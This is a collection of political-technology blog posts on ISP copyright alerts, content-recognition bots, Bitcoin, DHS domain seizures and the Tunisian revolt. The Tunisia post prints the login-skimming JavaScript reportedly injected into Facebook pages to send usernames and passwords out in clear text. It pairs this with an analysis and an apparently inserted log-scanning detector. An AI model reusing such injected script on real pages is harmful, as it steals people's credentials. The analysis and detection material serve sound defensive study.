
The Copyright Alert System Now Being Rolled Out at Major ISPs

In the next two months, AT&T, Time Warner, Verizon and Comcast will implement the Copyright Alert System program developed by The Center for Copyright Information. Of course, The Center for Copyright Information is a RIAA and MPAA front. The monitoring system that will be used will rely on the MarkMonitor service that has been in place for a number of years now. The “monitors” will be The Center for Copyright Information, i.e., RIAA and MPAA. Once again, these entities have been monitoring BitTorrent traffic for years. Indeed, a recently presented Security Research Paper concludes that you can expect to be tracked within 3 hours of firing up a torrent client.

The primary change is that in lieu of direct legal action (which can be frictional), the RIAA/MPAA, using the aforementioned ISPs as agents, can now engage in a relatively frictionless enforcement operation. And this is where the data analytics begin to kick in. Large-scale users will still be subject to the same modus operandi legal action but the voluminous data that has been collected over the years by the likes of MarkMonitor will now be used as a queryable data repository against which the new data will be used–according to whatever algorithm employed–to trigger the Copyright Alert Notifications to end users via that user’s ISP (serving an agency role of a Sheriff, more or less).

Evasion tactics? Well forget about things like Tor. Tor works over the tcp protocol (and can’t handle the load of p2p file sharing to begin with). BitTorrent these days works over udp. Sophisticated encryption techniques like mse/pe to me are more about thwarting ISP throttling, but in this case it is not the ISPs who are the monitoring agent. The best evasion technique is to use a udp proxy. But I imagine that a reliable service with tolerable speed is going to cost money which begs the question a bit of why not simply spend the money on a paid download music service. That was basically my decision around 6 years ago when the opportunity costs of evasion (when the monitoring really began to pick up) well exceeded the monthly subscription cost of a paid service.

Of course, the Copyright Alert System is just a harbinger of things to come. These types of arrangements up and down the IT stack will increase by orders of magnitude under the formal adoption of whatever “cybersecurity act” that eventually passes (once again, because the basic top-level rules will be enacted via fiat, i.e., executive decision, the subsequent proposal and adoption of a legislative act is an absolute certainty). And this, of course, just exposes the silliness of the “network neutrality debate” because “network traffic” should always be understood to mean “authorized network traffic.” The arbitration between “authorized” and “unauthorized” traffic will be subject to the most relentless data analytics imaginable.

I will also offer a brief comment on unjustified triumphalism that thinks these issues can be magically skirted around. This belief is based on a fundamental mischaracterization of the internet as a horizontal, decentralized type of network. But it is not that. Rather, the internet is a type of scale-free, small network that follows a power law distribution. The network property of scale-free invariance is very much a product of quite a bit of centralized coordination. Simply, it is a mistake to think that technology alone can overcome the problem of political economy. Instead a necessary condition to be able to “route around the damage” is jurisdictional differentiation in political economy. I’ve been harping on this point for a couple of years in my posts about Wikileaks. If the jurisdictional differentiation melts away then feel free to proceed straight to the outright pessimism of Evgeny Morozov and Richard Stallman who have given up on the anarchic promise of the internet. The alternative is a platform that turns out to be very well suited for tight control by Corporation and State. The evidence for this latter pessimism is the degree of rent-seeking in data analytics this little platform of ours affords (which makes the actions of State agency very much “rational” and hardly stupid in this space). The game is up when the cyber-security and “data czars” come rolling down the pike.

Finally, The Copyright Alert System is once again immediate evidence of a “Commercialist” anomaly with regard to political economic agency. Methodological individualism is hard pressed to explain ISPs acting as a Sheriff Agency (on behalf of the RIAA/MPAA) against their own customers. The model of The Firm, however, explains it quite well.

Technology is not Freedom

“Copyright bots” are a new “innovation” in data-analytics. The reliability of the data recognition (the content signature) by these distributed platforms, however, is still quite faulty. Wired recently published some of the embarrassing false positives generated by these platform censors which resulted in termination outages on high-profile content providers. Content that has recently been blocked included Michelle Obama’s speech on Youtube, NASA’s broadcast of the Curiosity Rover on Youtube and the Hugo Awards on UStream.

The more interesting point of the story was buried a bit: all major content platform providers are embedding these spy platforms into their infrastructure. This is not an actual legal requirement but it is following a law of political economy.

I browsed over to the website of one of the major players in this field. The tagline of the website reads: “Powering the Internet Video Economy.” The home page splash presentation trumpets the company’s partnership with Hollywood, Professional Sports, and China. I looked at its application platform, a platform, of course, that’s patent pending (patenting the enforcement of patents and copyrights). The jargon reads “Rights Management, Content Filtering and Monetization, Business Analytics, Automatic Content Recognition, Search Recommendations.” In plain terms this means they are spying on you to both restrict unauthorized access to content and to monetize your viewing habits for “authorized content.” Frankly, why wouldn’t a censoring platform with access to your viewing habits take advantage of it to monetize your preferences to “legitimate” content providers? It’s called Capitalism, right?

Content Identification and Data Signature Analysis is an “industry” in its infancy. There is plenty of innovation to be had in the pursuit of economic rents in this sector of political economy. But I would cite it as an easy example of how technological innovation is not necessarily going to improve your life and make you more free. In fact, as in this case, it’s likely to make you substantially less free. This was a point I tried to make in my recent two-part “Internet Freedom” posts. And as I noted, the business of data analytics was at the heart of Peter Thiel’s recent critique of Google CEO Eric Schmidt.

Fine, you say. Just don’t watch your content online. No one is forcing you to log on to Google to watch content. But it won’t end there. Currently, all major online content providers are busy integrating content spyware into their infrastructure and platforms. But the same law of political economy driving this will steer a “spy regulatory platform” to the network provider layer, too.

Although it is not a major news or blogosphere focus, the “cybersecurity” executive order publicly contemplated by Barack Obama is quietly moving through The Firm’s channels for executive implementation. A legislative reinforcement will follow eventually. The law of political economy–rent-seeking–predicts the legislative addendum/follow-up to a CEO decree because of competing players (rent-seeking agency) fighting over the specific compliance (rules) regime of the contest.

The broad structure of the contest is defined by the top-level rule:

immunity from liability with respect to network traffic in exchange for compliance

Obama’s CEO Executive Decree will “legally” establish the broad stroke of the top level rule. Namely:

(i) the rule that network providers are, ab initio, liable for the content payload of traffic over their network infrastructure (more specifically, liable for not filtering/blocking/counteracting “illegal/bad” traffic)

(ii) ex tempore immunity from all liability by following/implementing the rules of the compliance regime

The political economic competition in any “CyberSecurity Act” will be over the compliance rules for ex tempore immunity. Of course, any such “Bill” will be presented as ostensibly resolving the regulatory and legal burdens of network providers interfacing/info sharing with the extensive federal agency framework regarding “cyber attacks.” Every critical piece of infrastructure is plugged into the “public network” so we need a uniform, efficient regulatory framework to deal with the realities of the 21st century. It will even be presented with a “libertarian spin,” a pro-business slant, “reducing the regulatory burdens” on business.

Of course, the current reality of the 21st century is that the primary government agency responsible for coordinating cyber attacks is the United States government. The only agency actually capable of crippling the public network is the United States government.

The other pertinent reality of the 21st century is the inevitability of cloud computing. By “cloud computing,” I mean every computer resource imaginable delivered as a service. These resources include software, storage, platform, infrastructure, security and data. All tied together by a stack of interoperable APIs. It is in this environment where the contest over data analytics will play out. And you really can’t defect from this. More precisely, I would equate any attempt at defection as a “retreat to the woods.” Sans going “Jeremiah Johnson,” you will not be able to escape the data analytics of the cloud.

The ubiquity of cloud computing is inevitable because the internet is a small network. The cloud is much more efficient. A “free market” over a small network almost certainly delivers a cloud computing platform. Simply because that’s where the economic rents are. However, the data-analytics regime over the cloud is going to follow the structure of the rent-seeking contest. According to the contest structure I outlined above, the contest will follow a rent-seeking compliance of the panopticon.

Obey the panopticon or starve. That’s not freedom…

Chuck Schumer’s New War on Bitcoin

New York Senator Chuck Schumer probably occupies a top place in the libertarian axis of evil. A bigot, a religious fanatic, a nanny-state totalitarian and a crook, Schumer epitomizes the libertarian critique against political authority. This is a man who is accustomed to barking orders at a servile populace, a man who counts intimidation and threats to be among his preferred methods of executing governance. So this video and story of Schumer’s outrage over Silk Road and Bitcoin, likely facilitated by a recent Gawker article, is vintage Chuck. Conjure moral outrage, summon the TV cameras, bark orders…

But, unfortunately for Chuck, this ain’t Four Loko. Ordering the Feds to shut down the website and “seize the domain” was a comedic display of Mussolini buffoonery. I suppose it’s sad that no one in the press corps had the technical wherewithal to challenge Schumer’s stupidity, but it’s amusing that Schumer’s aide, the one that set up the TOR client to access the site, didn’t have the cojones to prevent Chuck from looking like a moron. But then again, I suppose it’s probably career suicide to stand between Schumer’s moral outrage and a TV camera.

Silk Road is running as a TOR hidden service on the TOR P2P tunneling network. This means it’s being run from someone’s anonymous box that generally can’t be identified. It can be anywhere in the world. Anyone who downloads the TOR software can set up a hidden service. There’s no “domain name” to seize here and the only way to stop this sort of thing (at least until the “Internet Kill Switch Bill” is enacted) is to ban the TOR protocol outright, which would counter the government’s interests because: (i) it would cast the US in a bad authoritarian light (ii) more importantly, it’s used by US intelligence organs as a secure communications tunneling network with international assets. After all, it was the US government that originally developed it, and it was released into the wild because it’s useless, like any other P2P network, without a robust number of nodes. In particular, here, a TOR network of nodes consisting of just the spies, informants and US bureaucrats would be a “stick out like a sore thumb” tunnel; these tunnels need lots of “noise,” that is, lots and lots of other tunnels to be effective. Also, of course, if the software was “classified,” there would be an obvious distribution problem of getting the software into the hands of the intelligence assets, a vulnerability (which could be exploited, because the acquisition method of the software could be compromised and tracked) that, combined with the “stick out like a sore thumb” intelligence-only tunnels, would make TOR useless. And this is why the US government released TOR into the wild.

Chuck hasn’t gotten the memo on TOR yet, but I imagine he will get the intelligence organ “sit down” on that. It’s not TOR that’s the threat, it’s Bitcoin. Schumer called Bitcoin a “money laundering mechanism;” certainly he is ready to take the lead in Senate hearings to foster drafting new legislation that would outlaw any unauthorized crypto-currency. However, the government, particularly the intelligence organs, is a bit ahead of Schumer in that the CIA is sponsoring a presentation by the Bitcoin lead developer.

Hitherto, the problem of crypto-currencies, in terms of being any threat to the State, was the need of a central authority to regulate against fraud. Anyone can define an electronic coin as a ledger/chain of digital signatures. One obvious problem is how to prevent Agent A, who is wishing to transfer ownership of the coin for a good/service, to simultaneously use the same coin to buy something from Agent B and Agent C, that is, more or less simultaneously digitally sign over the coin to Agent B and Agent C. This problem would seem to require a central authority to referee between A’s transaction with B and A’s transaction with C.

The Bitcoin algorithm, from what I gather reading the technical whitepaper, solves the problem of transaction verification by incentivizing every node in the Bitcoin network to race for verification of outstanding transactions. In other words, every node is in competition to serve as the clearinghouse for the current existing block of unverified transactions. The verification is done by timestamp. All transactions are broadcast to all nodes, but in a P2P network, Node X’s timestamp for the current unverified transactions may differ from Node Y’s timestamp for the same. The timestamp verification that wins out, that is the node that wins the clearinghouse game, depends on that node solving a “proof of work concept” that is able to solve a difficult mathematical problem of converting a hash representation of its own block into a required leading zero-bit format. The winning node then broadcasts its timestamp block to all nodes that readjust accordingly. The winning node is awarded a certain amount of bitcoins which serves as the first transaction in the next block of unverified transactions that will need to be verified.

Bitcoin is able to use competition to resolve the clearinghouse problem (clearinghouse nodes are incentivized by new coin creation). It ingeniously self-corrects for the introduction of cpu power by making the mathematical proof-of-work problem geometrically more difficult. This allows scalability without monopoly capture, but it does create a division of labor scenario where clearinghouse nodes invest in GPU cycles over CPU cycles (the investment in GPU cycles allows the system to handle the clearinghouse needs of an expanding system). However, the system constraints cap the total coin creation which means that clearinghouse nodes will eventually only compete over transaction fees.

The question concerning Bitcoin is two-fold: (i) can it survive a coordinated hacker attack (ii) can it survive government censorship/banning. We are probably about to find out about (ii). The thing about the US is that it is not a hard censorship regime; it’s a soft censorship regime. An actual honest-to-god crypto currency, however, is its worst nightmare. The US government will release something like TOR into the wild, but it would never release something like Bitcoin into the wild.

Social Network Platforms and Subversive Politics

Jesse Walker at Reason expresses skepticism concerning the branding of the Tunisian Revolution as a WikiLeaks Revolution.

I noted yesterday that some pundits have been calling the Tunisian revolt a “WikiLeaks revolution.” The phrase “Twitter revolution,” last spotted wandering around Tehran in a daze, has made a comeback as well. So now we’re in for a big boring debate about whether these boosterish labels fit, an argument that threatens to overshadow some much more interesting questions. The Internet is a series of tools. Some of those tools were used in Tunisia. I’d love to see some detailed investigations of how they were used, how they affected the use of older tools and tactics, how they advanced and/or held back the struggle, and how the regime responded to them. Debating whether their presence makes this a “[fill-in-the-blank] revolution,” by contrast, seems pointless.

Yesterday, I engaged in some bit of punditry that used the term “WikiLeaks Revolution.” Regarding Tunisian politics, I readily concede that I am an armchair blogger. However, I was careful to base my statements on journalists who could give an eyewitness account. In the post, I referenced an article in Foreign Policy Journal by Yvonne Ridley.

The demise of Ben Ali came when police prevented an unemployed 26-year-old graduate from selling fruit without a license. Mohammad Bouazizi turned himself into a human torch on December 17 and died of the horrific burns in Sidi Bouzid, in central Tunisia.

It was the final straw, a defining moment which ignited rallies, marches and demonstrations across Tunisia.

And revelations from Wikileaks cables exposing the corrupt and extravagant lifestyle of Ben Ali and his grasping wife fanned the flames of unbridled anger from a people who were also in the grip of poverty.

I knew it was coming. I saw the burning desire for freedom in the eyes of the courageous people of Ghafsa when the Viva Palestina Convoy entered the country in February 2009 on its way to Gaza.

Our convoy witnessed the menacing secret police intimidate the crowds to stop them from gathering to cheer us on.

This vast army of spies, thugs and enforcers even tried to stop us from praying in a local mosque.

That they stood their ground to cheer us on prompted me to leave my vehicle and hug all the women who had turned out. We exchanged cards and small gifts and then, to my horror, I discovered 24 hours later that every woman I had embraced in the streets of Gafsa had been taken away and questioned.

The broader context that brewed the revolution was a police state apparatus protecting a corrupt political economy. The trigger was an act of self-immolation by an unemployed recent university graduate who was robbed of his only means of supporting himself. The WikiLeaks cables were a catalyst.

Now on matters of internet technology I’m not so much of an armchair blogger. I can do my own investigative reporting. Now I do have quite a bit of skepticism regarding the intersection of technology and subversion politics. A lot of hype. There is even more hype regarding “social networking” and subversion politics. Things like “Twitter Revolution.”

The first thing to point out is to be careful about conflating WikiLeaks with social networking platforms. WikiLeaks is document-sourced journalism. The “Social Networking Platform” actually failed as a means of document-sourced investigative reporting. I’ve pointed this out several times before, and I’m only pointing out what Assange himself has emphasized on several occasions. So, immediately there is a limitation to the Social Networking Platform when it comes to subversion politics. WikiLeaks relies on traditional media institutions both to provide editorial context and to serve as a distribution source.

Now the Tunisian government, however, most certainly viewed the Social Networking Platform as a threat. Here’s a post from last July by a technically knowledgeable Tunisian citizen documenting how the Government was collecting social networking platform credentials of its citizens. At the time, this would appear to have been some type of an official DNS cache poisoning/Phishing attack. The Tunisian Internet Agency (ATI) is the upstream provider for all Tunisian ISPs. Certainly, then, from a technical standpoint, it would have been feasible. However, the blogger notes that the attacks occurred only intermittently so as to not arouse too much suspicion.

With the latest revolt, the Tunisian government, via the ATI, resorted to more sophisticated methods of “Phishing.” From Aljazeera, Tunisia’s bitter cyberwar, we learn that ATI was injecting javascript code into Social Networking Platform login pages that intercepted the user login and used AJAX “Get” requests to send user credentials in clear text over the wire. I investigated this, and at least with respect to Facebook, I could see how this attack could work.

The hacktivist “Anonymous” posted the HTML source for the Facebook login here. Below is the “phishing code” that was apparently being injected by ATI.


function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}

In the “form tag” of the html, an onsubmit client event, “onsubmit=’hAAAQ3d()’,” was also being injected that would trigger the phishing code. It’s fairly simple in operation. A user login would also trigger a client onsubmit event handler, which is the function “hAAAQ3d().” This function uses the Document DOM model to capture the username and password. It then passes each to a function “h6h” that uses string manipulation for a very weak encryption. It then builds a “url string” with the weakly encrypted username and password in the querystring. It then uses the XMLHttpRequest object (or the MS ActiveXObject version in the event of Internet Explorer) to pass this url in a client-side, synchronous AJAX Get Request. The actual url, of course, on the Facebook side (for browser cross-domain security reasons, the domain in the url must be facebook.com) doesn’t exist. The intent is to pass the url, the url with the username and password in the querystring, in clear text over the wire that can then be captured by ATI.
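For anyone reviewing proxy or capture logs from that period, the scheme described above leaves a recognisable trace. The following is an added example, not code from the original post or from any tool it mentions: it flags request URLs that match the injected script's beacon and recovers the affected account name, which shows that the "encryption" reverses without any key. The function names and the sample URLs are constructed for illustration.

```javascript
// Added example, not code from the original post. Function and constant names
// are hypothetical; the path and parameter names come from the quoted script.
const BEACON_PATH = "/wo0dh3ad";

// h6h() output is always an even-length run of the letters 'a'..'p'.
function isNibbleEncoded(s) {
  return typeof s === "string" && s.length > 0 &&
         s.length % 2 === 0 && /^[a-p]+$/.test(s);
}

// Inverse of h6h(): two letters per byte, high nibble first, no key involved.
// h6h() masks each char code to 8 bits, so only the low byte is recoverable.
function decodeNibbles(encoded) {
  if (!isNibbleEncoded(encoded)) return null;
  let out = "";
  for (let i = 0; i < encoded.length; i += 2) {
    const hi = encoded.charCodeAt(i) - 97;
    const lo = encoded.charCodeAt(i + 1) - 97;
    out += String.fromCharCode((hi << 4) | lo);
  }
  return out;
}

// Scan logged request URLs and report each login that was sent to the beacon.
// Only the account name is decoded: a responder needs to know which accounts
// to reset, not what the exposed password was.
function findExposedLogins(requestUrls) {
  const findings = [];
  for (const raw of requestUrls) {
    let url;
    try {
      url = new URL(raw);
    } catch (err) {
      continue; // unparsable log entry
    }
    if (url.pathname !== BEACON_PATH) continue;
    const u = url.searchParams.get("u");
    const p = url.searchParams.get("p");
    if (!isNibbleEncoded(u) || !isNibbleEncoded(p)) continue;
    findings.push({
      host: url.hostname,
      sentInCleartext: url.protocol === "http:",
      account: decodeNibbles(u),
    });
  }
  return findings;
}

// Constructed sample log entries (not real traffic).
const SAMPLE_REQUEST_URLS = [
  "http://www.facebook.com/wo0dh3ad?q=kqzvx&u=gbeagccohego&p=hahhdb",
  "http://www.facebook.com/login.php?login_attempt=1",
  "http://www.facebook.com/wo0dh3ad?q=abcde&u=zzz&p=hahhdb", // wrong alphabet
  "not a url",
];

console.log(findExposedLogins(SAMPLE_REQUEST_URLS));
```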

“Anonymous” posted a GreaseMonkey script for Firefox that stripped the “phishing script” from Social networking platform login pages. EFF issued a Security Bulletin on Jan. 11th that highlighted the “phishing attempts.” From all accounts, the “phishing attempts,” or at least attempts by this particular method, had ceased by Jan. 11th or Jan. 12th.

Hacktivist “Anonymous” also participated in DDoS attacks against Tunisian government websites that were successful. But as I have noted in previous “WikiLeaks Watch” posts, Anonymous/AnonOps uses IRC (Internet Relay Chat) to organize participants in this endeavor. And IRC has been around forever.

For all you Gen Y types out there: IRC and UseNet were to Gen X as the Social Network Platform is to Gen Y. The difference between the two “platforms” is that the SNP has a better API, with regard to web and particularly with regard to today’s ubiquitous mobile devices. It’s an evolution. But a revolution? That’s debatable.

The lesson regarding SNP and the Tunisian government is that SNP can be quite resilient against “technical attacks.” Its importance in the Tunisian revolution was magnified because it was attacked by the Tunisian government. That was a mistake. But the Ben Ali regime is not the US Government. The US Government can ex post facto condemn the crude “censorship” of the Ben Ali regime while working methodically behind the scenes to capture the political economy of SNP. We have already seen this with respect to WikiLeaks and the financial banking system. Cutting off means of financial support is a far more subtle and far more powerful means of censorship.

“Anonymous” is a hero when it attacks the crude, technical censorship of the Ben Ali regime. But it’s criminal when it attacks the political economy of US censorship.

As I maintain, and will continue to maintain, a political hack must be at the heart of undermining the statist 21st century political economy. Technical utopianism isn’t going to cut it alone. For example, Peter Thiel’s supposed libertarian e-money transaction system (PayPal) ended up being politically captured and now is a powerful component of SNP soft censorship.

SNP that can reinforce a political hack(s) has the potential to be revolutionary. But without the political hacks, it is only evolutionary, and the evolutionary path would be more along the lines of human social fitness for the Orwellian Boot. To the extent that SNP does threaten to become revolutionary, you can bet the mainstream babble about “Twitter Revolution” will change in tone.

Update on DHS/ICE Domain Seizures

My post, The Background Dope on DHS Recent Seizure of Domains, that I published last Saturday evening generated a significant traffic spike to my blog. I had a ton of referrers coming from facebook, twitter, tech forums and quite a few originating from tech publications. A Techdirt.com article, Homeland Security’s Domain Name Seizure May Stretch The Law Past The Breaking Point, used my post as the technical analysis of the mechanics of the “domain seizures” and then referenced this article, Domain Name Seizures and the Limits of Civil Forfeiture, by Larry Downes to examine the legality of these domain name seizures or forfeitures.

Since my original post, we have learned that these seizures were part of the “Operation In Our Sites” initiative. Indeed, this was dubbed by the DOJ as “Operation In Our Sites 2.” It should be recalled, the first phase involved the raiding of and shutting down of 9 “pirate movie sites.” These were site shutdowns, raids, executed search warrants, bank account seizures; the domain registrant information was transferred over to ownership by DHS. In phase two, none of this is going on; nothing is being seized, no one is being raided. No one is being notified of anything or presented with any warrant. You simply have a private company acting as contractual agent of the DHS modifying the .com TLD Zone Files in cooperation with VeriSign, which is the agency that has the ICANN contractual delegated authority to manage the .com TLD.

Larry Downes is discussing the issue of “pre-trial” confiscation. I’m not a lawyer but I would posit here, in “Phase II,” the issue is “pre-legal” confiscation. There is no principle of law being followed here. It’s just simple manipulation of the domain name system. Everyone knows that ICANN is subject to the laws of the US. But now, perhaps it might be dawning on people that this means today that it is more and more becoming subject to the Authority of DHS. And simply re-constituting ICANN outside of US jurisdiction is pointless. If you are paying attention to the latest rounds of disclosures from Wikileaks, it should be obvious that the informal US jurisdictional reach is pretty ubiquitous.

To those techno-optimists out there who think p2p is the automatic answer to counter this type of thing, I question their understanding of network theory. Any scale-free network is characterized by hubs, those nodes that are highly connected. Any p2p solution that would have a hope of bypassing or supplanting the current DNS would have to evolve a type of synchronized connection hierarchy that would be vulnerable to Statist reprisal. The issue is not a technical one. It is a political one.
